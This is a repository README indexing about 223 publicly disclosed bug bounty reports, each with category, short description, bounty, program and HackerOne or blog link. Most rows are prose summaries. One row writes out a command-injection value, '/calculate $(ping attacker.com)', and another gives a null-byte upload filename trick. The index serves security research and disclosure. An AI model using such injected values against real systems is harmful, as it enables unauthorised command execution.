├── README.md
├── _config.yml
├── reports.html
└── reports.md
/README.md:
--------------------------------------------------------------------------------
1 | # Public Bug Bounty Reports
2 |
3 | ### Since ~2020
4 |
5 | Open for contributions from others as well, so please send a pull request if you can!
6 |
7 | # Content
8 | ### raw
9 | - [Markdown](https://github.com/pwnpanda/Bug_Bounty_Reports/blob/master/reports.md)
10 | - [HTML](https://github.com/pwnpanda/Bug_Bounty_Reports/blob/master/reports.html)
11 |
12 | ### Rendered
13 | - [Markdown](https://pwnpanda.github.io/Bug_Bounty_Reports/)
14 | - [HTML](https://pwnpanda.github.io/Bug_Bounty_Reports/reports.html)
15 |
16 | \# | Category | Description | Bounty | Program | URL
17 | -- | --- | --- | --- | --- | ---
18 | 1 | IDOR | IDOR for order delivery address | $3000 | Mail.ru | https://hackerone.com/reports/723461
19 | 2 | IDOR | IDOR to change API-key description | $250 | Visma | https://hackerone.com/reports/809967
20 | 3 | SSRF | STUN SSRF | $3500 | Slack | https://hackerone.com/reports/333419
21 | 4 | SQLi | Blind SQLi through GET | $5000 | Mail.ru | https://hackerone.com/reports/786044
22 | 5 | SQLi | Blind SQLi through GET | $5000 | Mail.ru | https://hackerone.com/reports/795291
23 | 6 | SQLi | Blind SQLi through GET | $3000 | Mail.ru | https://hackerone.com/reports/732430
24 | 7 | SQLi | SQLi | $2200 | Mail.ru | https://hackerone.com/reports/738740
25 | 8 | SQLi | Blind Boolean based SQLi through GET | $300 | Mail.ru | https://hackerone.com/reports/398131
26 | 9 | Buffer Overflow | Buffer Overflow | $1750 | Valve | https://hackerone.com/reports/458929
27 | 10 | Buffer Overflow | Buffer Overflow | $10,000 | Valve | https://hackerone.com/reports/542180
28 | 11 | CSRF | CSRF in iOS app | $2940 | Twitter | https://hackerone.com/reports/805073
29 | 12 | Open redirect | Phishing Open Redirect | $560 | Twitter | https://hackerone.com/reports/781673
30 | 13 | DoS | DoS | $560 | Twitter | https://hackerone.com/reports/767458
31 | 14 | DoS | DoS | $560 | Twitter | https://hackerone.com/reports/768677
32 | 15 | Information leak | Private key disclosed | $2000 | Slack | https://hackerone.com/reports/531032
33 | 16 | Request Smuggling | Request Smuggling | $6500 | Slack | https://hackerone.com/reports/737140
34 | 17 | Account Takeover | Brute force account takeover via recovery code | $3000 | Mail.ru | https://hackerone.com/reports/730067
35 | 18 | Information leak | Arbitrary memory leak through API call | $10,000 | Mail.ru | https://hackerone.com/reports/513236
36 | 19 | XSS | Blind Stored XSS | $600 | Mail.ru | https://hackerone.com/reports/659760
37 | 20 | LFI (Information leak) | Local File Inclusion | $4000 | Starbucks | https://hackerone.com/reports/780021
38 | 21 | LFI | Arbitrary file inclusion & execution | $1000 | Valve | https://hackerone.com/reports/508894
39 | 22 | Information leak | Low impact information leak | $500 | HackerOne | https://hackerone.com/reports/826176
40 | 23 | Insufficient security controls | CORS misconfiguration | $1000 | SEMrush | https://hackerone.com/reports/235200
41 | 24 | Logic bug | Domain authority regex logic bug | $6000 | Google | https://bugs.xdavidhu.me/google/2020/03/08/the-unexpected-google-wide-domain-check-bypass/
42 | 25 | Privilege escalation | Abusing backup and restore function to escalate privileges | $1500 | Ubiquiti Inc | https://hackerone.com/reports/329659
43 | 26 | Privilege escalation | Arbritrary file deletion + DLL Hijacking leads to privilege escalation during install | $667 | Ubiquiti Inc | https://hackerone.com/reports/530967
44 | 27 | Information leak | Unauthenticated API endpoint leaking holiday schedule of employees in China | $4000 | Starbucks | https://hackerone.com/reports/659248
45 | 28 | Account takeover | Changing URL path from login to new-password allows merging victims store to attackers account | $7500 | Shopify | https://hackerone.com/reports/796956
46 | 29 | Improper access control | Unauthenticated API allows enumeration of user names & phone numbers | $500 | Razer | https://hackerone.com/reports/752443
47 | 30 | Authentication bypass | Auth bypass allowing access to support tickets | $1500 | Razer | https://hackerone.com/reports/776110
48 | 31 | Privilege escalation | Same as below, but change of email HAS to be completed before receiving the email verification request. Rewarded due to different root cause | $15,000 | Shopify | https://hackerone.com/reports/796808
49 | 32 | Privilege escalation | Takeover any shopify store by registering email, sending email verification request, changing email and confirming request chain | $15,000 | Shopify | https://hackerone.com/reports/791775
50 | 33 | Command injection | Abusing relative paths to run custom scripts during startup | $750 | Slack | https://hackerone.com/reports/784714
51 | 34 | Authentication bypass | View webcam and run code in context of any webpage in Safari | $75,000 | Apple | https://www.ryanpickren.com/webcam-hacking-overview
52 | 35 | XSS | Stored XSS through chat message | $300 | Vanilla | https://hackerone.com/reports/683792
53 | 36 | IDOR | IDOR allows enumeration of users with connected google analytics or the amount of calendars owned by a single user | $500 | SEMrush | https://hackerone.com/reports/797685
54 | 37 | Logic Error | Negative values allowed for price parameters allowed for free goods | $2111 | SEMrush | https://hackerone.com/reports/771694
55 | 38 | XSS | Stored XSS in customer chat | $1000 | Shopify | https://hackerone.com/reports/798599
56 | 39 | XSS | XSS through FB Group integration | $500 | Shopify | https://hackerone.com/reports/267570
57 | 40 | SQLi | Error-based SQLi through GET | $1500 | Mail.ru | https://hackerone.com/reports/790005
58 | 41 | SSRF | Blind SSRF | $150 | Mail.ru | https://hackerone.com/reports/120298
59 | 42 | IDOR | Leaking order information due to IDOR (No PII, only bought items) | $150 | Mail.ru | https://hackerone.com/reports/791289
60 | 43 | Code injection | PHP injection through unserialize() leading to code execution | $3000 | Mail.ru | https://hackerone.com/reports/798135
61 | 44 | Subdomain Takeover | Dangling AWS Record allowed zone transfer, leading to access to cookies and CORS, which could facilitate phishing attacks | $500 | Uber | https://hackerone.com/reports/707748
62 | 45 | Logic Error | No validation that user rated his own trips, meaning drivers could alter their ratings. | $1500 | Uber | https://hackerone.com/reports/724522
63 | 46 | LFI | Using PDF-generator and an iframe, one could export the PDF with arbritrary file content | $500 | Visma | https://hackerone.com/reports/809819
64 | 47 | XSS | Dom XSS in IE & Edge on main page | $1000 | ForeScout Technologies | https://hackerone.com/reports/704266
65 | 48 | Logic Error | Overwrite data as low privilege user, by renaming existing folder to the name of a folder you do not have access to | $250 | NextCloud | https://hackerone.com/reports/642515
66 | 49 | Improper access control | Unauthenticated API allowed an attacker to change hostname of device | $550 | UniFi Cloud | https://hackerone.com/reports/802079
67 | 50 | SQLi | SQLi through multiple parameters, but in unused service. Data exfiltration possible. | $2000 | Razer | https://hackerone.com/reports/777698
68 | 51 | SQLi | SQLi through get parameter allowed for data exfiltration from Thai users. | $2000 | Razer | https://hackerone.com/reports/768195
69 | 52 | SQLi | SQLi allowing for access to data on Thai server. | $2000 | Razer | https://hackerone.com/reports/781205
70 | 53 | SSRF | SSRF that could have lead to compromise of server and significant data breach | $2000 | Razer | https://hackerone.com/reports/777664
71 | 54 | Information leak | PHP file with source code exposed. No exploit. | $200 | Razer | https://hackerone.com/reports/819735
72 | 55 | CSRF | CSRF token with 24h lifetime, leading to possibility of connecting attackers paypal with victims shopify account | $500 | Shopify | https://hackerone.com/reports/807924
73 | 56 | Code Injection | MacOS client is vulnerable to low-privilege attacker injecting code into the application using dylib. This is due to lack of setting the Hardened Runtime capability in XCODE | $250 | NextCloud | https://hackerone.com/reports/633266
74 | 57 | Information leak | Cleartext storage of API keys & tokens. Very poorly handled. | $750 | Zenly | https://hackerone.com/reports/753868
75 | 58 | Improper access control | AWS Bucket access key transmitted in cleartext | $300 | BCM Messenger | https://hackerone.com/reports/764243
76 | 59 | Improper access control | Able to add paid function for 14 days for free | $200 | Coda | https://hackerone.com/reports/777942
77 | 60 | XSS | Blind XSS in admin panel through a partner's superuser name | $750 | Mail.ru | https://hackerone.com/reports/746497
78 | 61 | XSS | Blind XSS in admin panel through a partner's superuser name (Same issue, different endpoint) | $750 | Mail.ru | https://hackerone.com/reports/746505
79 | 62 | SSRF | SSRF & Local File Read via photo upload | $6000 | Mail.ru | https://hackerone.com/reports/748128
80 | 63 | SSRF | SSRF & Local File Read via photo retrieving functionality | $6000 | Mail.ru | https://hackerone.com/reports/748069
81 | 64 | SSRF | SSRF & Local File Read via photo editor | $6000 | Mail.ru | https://hackerone.com/reports/748123
82 | 65 | Logic Error | A partner account with manager role could withdraw money from driver's account | $8000 | Mail.ru | https://hackerone.com/reports/751347
83 | 66 | XSS | Reflected XSS through XML Namespace URI | $500 | Mapbox | https://hackerone.com/reports/780277
84 | 67 | Code Injection | HTML Injection for IE only | $500 | Mail.ru | https://hackerone.com/reports/757100
85 | 68 | DoS | Cache poisoning CORS allow origin header | $550 | Automattic | https://hackerone.com/reports/591302
86 | 69 | IDOR | Remote wipe of other users device | $500 | Nextcloud | https://hackerone.com/reports/819807
87 | 70 | SSRF | GitLab local instance SSRF bypass through DNS Rebinding in WebHooks | $3500 | GitLab | https://hackerone.com/reports/632101
88 | 71 | LFI | openStream called on java.net.URL allows access to local resources when passing in file:// or jar:// | $1800 | GitHub Security Lab | https://hackerone.com/reports/844327
89 | 72 | Logic Bug | Not checking if LINUX privilege is successfully dropped leads to increased attack surface | $1800 | GitHub Security Lab | https://hackerone.com/reports/845729
90 | 73 | SQLi | Arbitrary SQL queries via DocID parameter of Websocket API | $1800 | GitHub Security Lab | https://hackerone.com/reports/854439
91 | 74 | Logic Bug | Account takeover through link injection in contact form | $1000 | Insolar | https://hackerone.com/reports/786741
92 | 75 | Information leak | Ability to see other shops product title, only if they are using a particular app and has an attachment | $500 | Shopify | https://hackerone.com/reports/848625
93 | 76 | XSS | Reflected XSS on API Server (No regular users browsing the page) | $250 | Razer | https://hackerone.com/reports/791941
94 | 77 | Brute Force | Counter-specific (?) password was not protected against brute force attacks | $150 | Mail.ru | https://hackerone.com/reports/754536
95 | 78 | Authentication bypass | Knowing the victims phone number allowed access to partial information about the victims travel. Payment type, profile information, etc. | $8000 | Mail.ru | https://hackerone.com/reports/772118
96 | 79 | Information leak | API endpoint disclosed e-mails of subscribed users | $250 | Mail.ru | https://hackerone.com/reports/703086
97 | 80 | DoS | DoS & Unsafe Object creation through JSON parsing | $500 | Ruby | https://hackerone.com/reports/706934
98 | 81 | Logic Error | Session Expiration is not enforced during signup. Bypass can be done by deleting HTML element blocking progress | $100 | Visma | https://hackerone.com/reports/810400
99 | 82 | Subdomain Takeover | Subdomain takeover due to expired / unclaimed Hubspot instance | $2500 | Roblox | https://hackerone.com/reports/335330
100 | 83 | Information leak | Endpoint vulnerable to Heartbleed | $1500 | Uber | https://hackerone.com/reports/304190
101 | 84 | RCE | LFI through Path Traversal in image-tag in Markdown. Disclosure of local files leads to disclosure of secret, which can be used to achieve RCE through deserialization | $20,000 | GitLab | https://hackerone.com/reports/827052
102 | 85 | Prototype Pollution | Simple prototype pollution due to improper handling of zipObjectDeep | $250 | Node.js Third Party Modules (lodash) | https://hackerone.com/reports/712065
103 | 86 | Information disclosure | Session is not properly invalidated after logging out. When creating a store before upgrading your account, visitors are required to enter a password. This password is disclosed after logging out, when visiting a certain link. | $500 | Shopify | https://hackerone.com/reports/837729
104 | 87 | IDOR | Able to bypass ban restrictions through path normalization. APIs are also unrestricted | $800 | Roblox | https://hackerone.com/reports/703058
105 | 88 | Phishing | Link url falsification by altering post message | $250 | Slack | https://hackerone.com/reports/481472
106 | 89 | Information leak | Leaking (unrestricted?) Google API key | $150 | Identify | https://hackerone.com/reports/724039
107 | 90 | Improper access control | Read-only team members can read all properties of webhooks, through graphql | $0 | HackerOne | https://hackerone.com/reports/818848
108 | 91 | DoS | DoS through sending large message to the server | $500 | Roblox | https://hackerone.com/reports/679907
109 | 92 | IDOR | Access to log files based on IDOR through exposed signature in Razer Pay Android App | $500 | Razer | https://hackerone.com/reports/754044
110 | 93 | Path Traversal | Misconfiguration when handling URI paths allowed for docroot path traversal giving access to non-sensitive data usually not accessible to users | $500 | Starbucks | https://hackerone.com/reports/844067
111 | 94 | Improper Certificate Validation | Client side traffic hijacking allowed for user data interception (Local?) | $750 | Razer | https://hackerone.com/reports/795272
112 | 95 | Improper authorization | The Razer Pay backend server could be exploited to obtain transaction details from another user | $500 | Razer | https://hackerone.com/reports/754339
113 | 96 | SQLi | Razer Pay API was vulnerable to SQLi exposing user information | $2000 | Razer | https://hackerone.com/reports/811111
114 | 97 | Improper authorization | Reverse engineering the Android app allowed for bypassing the signatures in place to prevent parameter tampering, discovering a variety of IDOR issues | $1000 | Razer | https://hackerone.com/reports/753280
115 | 98 | HTTP Response Splitting | Limited CRLF injection allowed for manipulation of cookies | $150 | Mail.ru | https://hackerone.com/reports/838682
116 | 99 | IDOR | Issue with the marketplace due to length restriction in choosing hashing function | $5000 | SEMrush | https://hackerone.com/reports/837400
117 | 100 | SSRF | SSRF & LFI in Site Audit due to lack of connection protocol verification | $2000 | SEMrush | https://hackerone.com/reports/794099
118 | 101 | SSL Downgrade | Possible to temporarily downgrade a victim from HTTPS to HTTP in Firefox. Required victim clicking a link and had a very short timeframe to be successful | $500 | Uber | https://hackerone.com/reports/221955
119 | 102 | XSS | Reflected XSS due to outdated Wordpress installation lead to exposure of sensitive form data and user data | $4000 | Uber | https://hackerone.com/reports/340431
120 | 103 | Open Redirect | Open redirect in get parameter | $50 | Unikrn | https://hackerone.com/reports/625546
121 | 104 | DoS | Bypassing character limitation on ´Moments´ feature and creating many of them leads to DoS | $560 | Twitter | https://hackerone.com/reports/819088
122 | 105 | CRLF Injection | CRLF injection in urllib | $1000 | Python (IBB) | https://hackerone.com/reports/590020
123 | 106 | Subdomain Takeover | Out of scope, no impact subdomain takeover of uptimerobot page | $100 | BTFS | https://hackerone.com/reports/824909
124 | 107 | SQLi | Blind Boolean-based SQLi in Razer Gold TH | $1000 | Razer | https://hackerone.com/reports/790914
125 | 108 | SSRF | SSRF allowing port scanning of localhost through host header injection | $300 | TTS Bug Bounty | https://hackerone.com/reports/272095
126 | 109 | Cryptographic Issues | A variety of WPA3 issues related to cryptography and logic | $750 | The Internet | https://hackerone.com/reports/745276
127 | 110 | XSS | Reflected XSS on resources.hackerone.com | $500 | HackerOne | https://hackerone.com/reports/840759
128 | 111 | Information leak | Un-minified JS code disclosed on some pages | $250 | Imgur | https://hackerone.com/reports/845677
129 | 112 | XSS | Self-XSS to normal XSS by bypassing X-Frame-Options to automatically execute JS through loading content through iframes | $250 | Pornhub.com | https://hackerone.com/reports/761904
130 | 113 | IDOR | A partner account could access another partner's driver data through an IDOR | $1500 | mail.ru | https://hackerone.com/reports/747612
131 | 114 | IDOR | A partner account could access information about other partners through an IDOR | $1500 | mail.ru | https://hackerone.com/reports/746513
132 | 115 | IDOR | A partner with manager role could takeover a drive's account belonging to a different partner | $8000 | mail.ru | https://hackerone.com/reports/751281
133 | 116 | XSS | Stored XSS on messages to drivers through the operator interface | $500 | mail.ru | https://hackerone.com/reports/751263
134 | 117 | Code Execution | PHP Code Execution through image upload functionality | $3000 | mail.ru | https://hackerone.com/reports/854032
135 | 118 | Improper Access Control | Delete projects from archived companies set to Read-Only. | $100 | Visma | https://hackerone.com/reports/849157
136 | 119 | Information leak | Account takeover due to leaking auth URLs on google & leaking OTP in API response | $500 | Badoo | https://hackerone.com/reports/746186
137 | 120 | XSS | Stored XSS through file upload (.pdf → JS) | $250 | Visma | https://hackerone.com/reports/808862
138 | 121 | Information leak | 404-page leaks all headers | $500 | HackerOne | https://hackerone.com/reports/792998
139 | 122 | CSRF | Friends Only account mode could be toggled through CSRF | $250 | Mail.ru | https://hackerone.com/reports/448928
140 | 123 | Subdomain Takeover | Possible due to wildcard pointing to uberflip domain | $500 | HackerOne | https://hackerone.com/reports/863551
141 | 124 | DoS | Improper error handling leads to DoS and service failure in case of supplying invalid "Redirect_URI" parameter | $1000 | GitLab | https://hackerone.com/reports/702987
142 | 125 | Information leak | Private program invites can disclose emails of any user invited by using username | $7500 | HackerOne | https://hackerone.com/reports/807448
143 | 126 | SSRF | SSRF through notification configuration. Requires admin privileges | $300 | Phabricator | https://hackerone.com/reports/850114
144 | 127 | Improper Access Control | Read-only user without access to payroll, can still access the data by visiting the URL directly | $250 | Visma | https://hackerone.com/reports/838563
145 | 128 | XSS | Code does not sufficiently escape template expressions, allowing for XSS | $500 | Ruby On Rails | https://hackerone.com/reports/474262
146 | 129 | Information leak | Potentially sensitive information leaked through debug interface | $150 | Mail.ru | https://hackerone.com/reports/748925
147 | 130 | Misconfiguration | Network restrictions on admin interface could be bypassed using alternate hostnames | $150 | Mail.ru | https://hackerone.com/reports/749677
148 | 131 | Request Smuggling | Request smuggling poisoning users using Host header injection | $750 | TTS | https://hackerone.com/reports/726773
149 | 132 | Lack of security mechanisms | Lack of user warning when opening potentially dangerous files from the chat window | $250 | Mail.ru | https://hackerone.com/reports/633600
150 | 133 | XSS | Reflected XSS in investor relations website due to unsanitized user input | $350 | Razer | https://hackerone.com/reports/801075
151 | 134 | SQLi | Blind SQLi due to no input sanitization on "Top Up" function in Razer Gold TH service | $1000 | Razer | https://hackerone.com/reports/789259
152 | 135 | Subdomain Takeover | Subdomain takeover | $250 | Razer | https://hackerone.com/reports/810807
153 | 136 | Open redirect | Open redirect in login flow | $150 | TTS | https://hackerone.com/reports/798742
154 | 137 | Race Condition | Race condition in email verification that awards in-game currency, leading to similar impact as payment bypass | $2000 | InnoGames | https://hackerone.com/reports/509629
155 | 138 | Account Takeover | Links on in-game forum leaks referer header, which contains CSRF token. The page also embeds links with the cookie value on the page. Utilizing self-xss combined with CSRF-token, you can grab cookie from DOM and send it to attacker resulting in Account Takeover | $1100 | InnoGames | https://hackerone.com/reports/604120
156 | 139 | XSS | Reflected XSS due to insufficient input sanitation. Could allow for account takeover or user session manipulation. | $1900 | PayPal | https://hackerone.com/reports/753835
157 | 140 | XSS | Stored XSS through bypass of file type upload limit by 0-byte. Uploading a xx.html%00.pdf with JS will work like a stored XSS when accessed | $250 | Visma | https://hackerone.com/reports/808821
158 | 141 | Improper Authentication | An issue in how Cloudflare's authoritative DNS server processes requests with ":" in it. This allows an attacker to spoof NXDOMAINs within safe zones. | $400 | Open-Xchange | https://hackerone.com/reports/858854
159 | 142 | Improper Access Control | Can reply or delete replies from any users in any public group, without joining said group. (Buddypress) | $225 | WordPress | https://hackerone.com/reports/837256
160 | 143 | Privilege Escalation | Author role has access to edit, trash and add new items within the BuddyPress Emails. | $225 | WordPress | https://hackerone.com/reports/833782
161 | 144 | CSRF | Profile field CSRF allows for deleting any field in BuddyPress | $225 | WordPress | https://hackerone.com/reports/836187
162 | 145 | Privilege Escalation | IDOR + Changing parameter from "Moderator" to "Admin" leads to privilege escalation | $225 | WordPress | https://hackerone.com/reports/837018
163 | 146 | Privilege Escalation | Chaining 5 vulnerabilities leads to privilege to root, by: Symlink attack combined with race condition leads to executing malicious code | $500 | NordVPN | https://hackerone.com/reports/767647
164 | 147 | XSS | Reflected XSS evading WAF + confirming insufficient fix | $1000 | Glassdoor | https://hackerone.com/reports/846338
165 | 148 | Information leak | New retest functionality discloses existence of private programs through having the tag added to the program description | $500 | HackerOne | https://hackerone.com/reports/871142
166 | 149 | XSS | Outdated PDF.js allows for XSS using CVE-2018-5158 | $100 | Nextcloud | https://hackerone.com/reports/819863
167 | 150 | DoS | DoS due to having a large amount of groups and sending a tampered request (Changed Accept-Encoding & User-Agent) | $500 | HackerOne | https://hackerone.com/reports/861170
168 | 151 | XSS | Stored XSS in user profile | $200 | QIWI | https://hackerone.com/reports/365093
169 | 152 | Logic Bug | Service time expiry validation bypass leads to unlimited use due to bypassing licensing time checks | $400 | NordVPN | https://hackerone.com/reports/865828
170 | 153 | Improper Access Control | Privilege escalation through improper access control on /membership/ endpoint | $500 | Helium | https://hackerone.com/reports/809816
171 | 154 | IDOR | Sending invitations is vulnerable to IDOR attack, resulting in being able to invite any account as administrator of a organization, by knowing the organizations UUID | $100 | Helium | https://hackerone.com/reports/835005
172 | 155 | Improper Access Control | Dcoker Registry API v2 exposed through HTTP, allowing for dumping & poisoning of docker images. | $2000 | Semmle | https://hackerone.com/reports/347296
173 | 156 | Code Injection | CodeQL query to detect JNDI injections | $2300 | GitHub | https://hackerone.com/reports/892465
174 | 157 | Information leak | GraphQL query can disclose information about undisclosed reports to the HackerOne program due to the retest feature | $2500 | HackerOne | https://hackerone.com/reports/871749
175 | 158 | Logic Bug | CodeQL query to detect improper URL handling | $1800 | GitHub | https://hackerone.com/reports/891268
176 | 159 | Information leak | CodeQL query to detect Spring Boot actuator endpoints | $1800 | GitHub | https://hackerone.com/reports/891266
177 | 160 | Logic Bug | CodeeQL query to detect incorrect conversion between numeric types in GOLang | $1800 | GitHub | https://hackerone.com/reports/891265
178 | 161 | Improper Access Control | Certain API methods were not properly restricted and leaked statistics about arbitrary domains | $400 | Mail.ru | https://hackerone.com/reports/831663
179 | 162 | Code Injection | Using chat commands functions like "/calculate 1+1" is possible, but it can be abused by using BASH syntax for executing commands "/calculate $(ping attacker.com)", leading to arbitrary code execution | $3000 | Nextcloud | https://hackerone.com/reports/851807
180 | 163 | Privilege Escalation | Can invite members to a "clan" even when the user does not have access to that function | $550 | InnoGames | https://hackerone.com/reports/511275
181 | 164 | XSS | AirMax software was vulnerable to Reflected XSS on multiple end-points and parameters | $150 | Ubiquiti inc. | https://hackerone.com/reports/386570
182 | 165 | Privilege Escalation | Changing email parameter allows privilege escalation to admin | $100 | Helium | https://hackerone.com/reports/813159
183 | 166 | Information leak | CodeQL query to detect logging of sensitive data | $500 | GitHub | https://hackerone.com/reports/886287
184 | 167 | CSRF | CSRF is possible in the AirMax software on multiple endpoints leading to possible firmware downgrade, config modification, file or token ex-filtration etc. | $1100 | Ubiquiti inc. | https://hackerone.com/reports/323852
185 | 168 | Account Takeover | No brute-force protection on SMS verification endpoint lead to account takeover | $1700 | Mail.ru | https://hackerone.com/reports/744662
186 | 169 | IDOR | API allowed for leaking information on job seekers / employers through IDOR | $500 | Mail.ru | https://hackerone.com/reports/743687
187 | 170 | XSS | Reflected XSS through URI on 404 page | $300 | Mail.ru | https://hackerone.com/reports/797717
188 | 171 | SSRF | SSRF through using functionality from included library that should be disabled | $10,000 | GitLab | https://hackerone.com/reports/826361
189 | 172 | Information leak | Insufficient verification leads to ability to read sensitive files | $10,000 | GitLab | https://hackerone.com/reports/850447
190 | 173 | Improper Authentication | Could impersonate and answer tickets belonging to other users | $550 | InnoGames | https://hackerone.com/reports/876573
191 | 174 | Subdomain Takeover | Subdomain takeover of iosota.razersynapse.com | $200 | Razer | https://hackerone.com/reports/813313
192 | 175 | XSS | Reflected xss through cookies on ftp server for Thai employees | $375 | Razer | https://hackerone.com/reports/748217
193 | 176 | XSS | Out of scope DOM XSS leading to impact on account security for in scope asset. Only applicable to IE and Edge. | $750 | Rockstar Games | https://hackerone.com/reports/663312
194 | 177 | SQLi | Search function was crashable disclosing error logs with useful information for other potential attacks. | $250 | Rockstar Games | https://hackerone.com/reports/808832
195 | 178 | Open Redirect | Could potentially leak sensitive tokens through referer header on GTA Online sub-site. | $750 | Rockstar Games | https://hackerone.com/reports/798121
196 | 179 | XSS | DOM XSS in GTA Online feedback endpoint. Other issues with the same root cause was also found on the same site. | $1250 | Rockstar Games | https://hackerone.com/reports/803934
197 | 180 | DoS | In email verification emails, the unique number is assigned sequentially, meaning you can invalidate all future registrations by visiting the following URL. Ex: confirmmail/1/jfaiu -> confirmmail/2/jfaiu | $150 | Vanilla | https://hackerone.com/reports/329209
198 | 181 | Information leak | External images could be referenced in the screenshot utility feature, possibly leading to FaceBook OAUTH token theft | $500 | Rockstar Games | https://hackerone.com/reports/497655
199 | 182 | XSS | Dom XSS on main page achieved through multiple minor issues, like path traversal and open redirect | $850 | Rockstar Games | https://hackerone.com/reports/475442
200 | 183 | XSS | Stored XSS through demo function in multiple parameters using javascript scheme | $750 | Shopify | https://hackerone.com/reports/439912
201 | 184 | Improper access control | After removing admin access from an account, it can still make changes with admin permissions until logged out. The account can also still make changes to embedded apps, but this is by design. | $1000 | Shopify | https://hackerone.com/reports/273099
202 | 185 | CSRF | Account takeover on social club by using CSRF to link an account to the attackers facebook account, leading to the ability to login as the victim | $1000 | Rockstar Games | https://hackerone.com/reports/474833
203 | 186 | XSS | Reflected XSS due to decoding and executing code after the last "/" on GTAOnline/jp. | $750 | Rockstar Games | https://hackerone.com/reports/507494
204 | 187 | Open Redirect | Open Redirect on the support page, impacting the mobile page | $750 | Rockstar games | https://hackerone.com/reports/781718
205 | 188 | XSS | DOM XSS on GTAOnline. Regressed Directory Traversal and new XSS issue | $750 | Rockstar games | https://hackerone.com/reports/479612
206 | 189 | Race Condition (TOCTOU) | Can click "This Rocks" (like) button any number of times, allowing an attacker to fill up the victims notification feed | $250 | Rockstar games | https://hackerone.com/reports/474021
207 | 190 | XSS | DOM XSS in the video section of GTAOnline page through returnurl-parameter, only exploitable on non-English versions. | $750 | Rockstar games | https://hackerone.com/reports/505157
208 | 191 | CSRF | CSRF on login page only, due to processing credentials before checking for CSRF protections. This is also only valid when forcing non 4xx responses from the server | $500 | HackerOne | https://hackerone.com/reports/834366
209 | 192 | RCE | RCE Through Blind SQLI in Where clause | $5500 | QIWI | https://hackerone.com/reports/816254
210 | 193 | RCE | RCE Through Blind SQLI in Where clause | $1000 | QIWI | https://hackerone.com/reports/816560
211 | 194 | RCE | RCE through Blind SQLI in prepared statement | $1000 | QIWI | https://hackerone.com/reports/816086
212 | 195 | IDOR | Read-only user can change name of device in admin account | $50 | Helium | https://hackerone.com/reports/865115
213 | 196 | Path Traversal | Access to restricted data through path traversal (requires valid authentication cookie) | $4000 | Starbucks | https://hackerone.com/reports/876295
214 | 197 | XSS | Combining two minor harmless injections results in dom based Reflected XSS | $250 | Starbucks | https://hackerone.com/reports/396493
215 | 198 | XSS | Bypass of previous issue by encoding " as %2522 | $250 | Starbucks | https://hackerone.com/reports/252908
216 | 199 | SQLi | Blind, time-based SQLi due to unsafe handling of GET parameter | $15,000 | Mail.ru | https://hackerone.com/reports/868436
217 | 200 | SSRF | By being able to redirect key lookups (since they are on your own domain and the lookup is done over DNS), you can trick the sending server into accessing arbitrary addresses. | $400 | Open-Xchange | https://hackerone.com/reports/792960
218 | 201 | SSRF | Same as 201 but through different code. Being able to control DNS records for your own domain, you can redirect servers accessing your domain to get your public key into returning data from an internal asset. | $400 | Open-Xchange | https://hackerone.com/reports/792953
219 | 202 | XSS | DOM XSS through XSS payload in UID field of key. Exploited by sending key to the victim, which then imports it. | $500 | Open-Xchange | https://hackerone.com/reports/788691
220 | 203 | Information disclosure | Attacker can leak OAUTH token due to redirect\_uri not properly detecting IDN Homograph attacks (Unicode character confusion attack - é = e) | $1000 | SEMrush | https://hackerone.com/reports/861940
221 | 204 | DoS | DoS through no length restriction on the "instruction" field when creating a new program. | $2500 | HackerOne | https://hackerone.com/reports/887321
222 | 205 | CSRF | CSRF token is not checked | $250 | Visma | https://hackerone.com/reports/878443
223 | 206 | Path Traversal | By executing a path traversal attack on the frontend, arbitrary API calls on the (internal only) backend was possible. This lead to being able to enumerate 100 million real users. | $4000 | Starbucks | https://samcurry.net/hacking-starbucks/
224 | 207 | Privacy Violation | Incorrect usage of Google AD ID integration lead to privacy issue | $200 | NordVPN | https://hackerone.com/reports/803941
225 | 208 | Insecure design principles | Including vendor based eval-stdin.php leads to potential RCE | $100 | NextCloud | https://hackerone.com/reports/820146
226 | 209 | CSRF | Lack of CSRF protection when linking FaceBook account with Social Club account, lead to potential takeover. Required preconditions and deception to succeed. | $550 | Rockstar Games | https://hackerone.com/reports/653254
227 | 210 | Information Disclosure | a chain of vulnerabilities leads to being able to possibly exfiltrate user tokens. One part was image injection in Screenshot-View function. | $500 | Rockstar Games | https://hackerone.com/reports/655288
228 | 211 | Information Disclosure | Image injection in www.rockstargames.com/bully/screens could be combined with other minor issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/661646
229 | 212 | XSS | DOM XSS in localized (different languages) Red Dead Redemption 2 video viewer. www.rockstargames.com/reddeadredemption2/br/videos | $750 | Rockstar Games | https://hackerone.com/reports/488108
230 | 213 | CSRF | CSRF issue in language changing function for GTA Online could be chained with other vulnerabilities to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/809691
231 | 214 | Information Disclosure | Image injection on www.rockstargames.com/bully/anniversaryedition. Could be combined with other issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/498358
232 | 215 | Information Disclosure | Image injection-fix bypass in the screenshot-viewer utility | $500 | Rockstar Games | https://hackerone.com/reports/505259
233 | 216 | Information Disclosure | Another Image injection-fix bypass in the screenshot-viewer utility | $500 | Rockstar Games | https://hackerone.com/reports/506126
234 | 217 | XSS | Flash file based Open Redirect and XSS vulnerability. | $500 | Rockstar Games | https://hackerone.com/reports/485382
235 | 218 | Open Redirect | Open Redirect in changing language functionality on https://www.rockstargames.com/GTAOnline. This could be used to leak sensitive tokens from the URL through Referer header. | $500 | Rockstar Games | https://hackerone.com/reports/870062
236 | 219 | XSS | Localized (different languages) versions of https://www.rockstargames.com/GTAOnline/ was vulnerable to DOM XSS in various locations. This combined with Open Redirect allowed for user token exfiltration. | $750 | Rockstar Games | https://hackerone.com/reports/508517
237 | 220 | Information Disclosure | Image injection on localized (different languages) versions of games/info endpoint (https://www.rockstargames.com/br/#/games/info). This could lead to leaking user tokens through Referer header. | $500 | Rockstar Games | https://hackerone.com/reports/510388
238 | 221 | Information Disclosure | Attack chain leading to leaking OAUTH tokens. Image injection in https://www.rockstargames.com/bully/anniversaryedition combined with other minor issues allowed for this attack to be successful. | $500 | Rockstar Games | https://hackerone.com/reports/659784
239 | 222 | XSS | DOM XSS in localized versions of GTA Online screenshot site, like the following: https://www.rockstargames.com/GTAOnline/jp/screens/ | $750 | Rockstar Games | https://hackerone.com/reports/508475
240 | 223 | XSS | DOM XSS in www.rockstargames.com/GTAOnline/features/freemode | $750 | Rockstar Games | https://hackerone.com/reports/799739
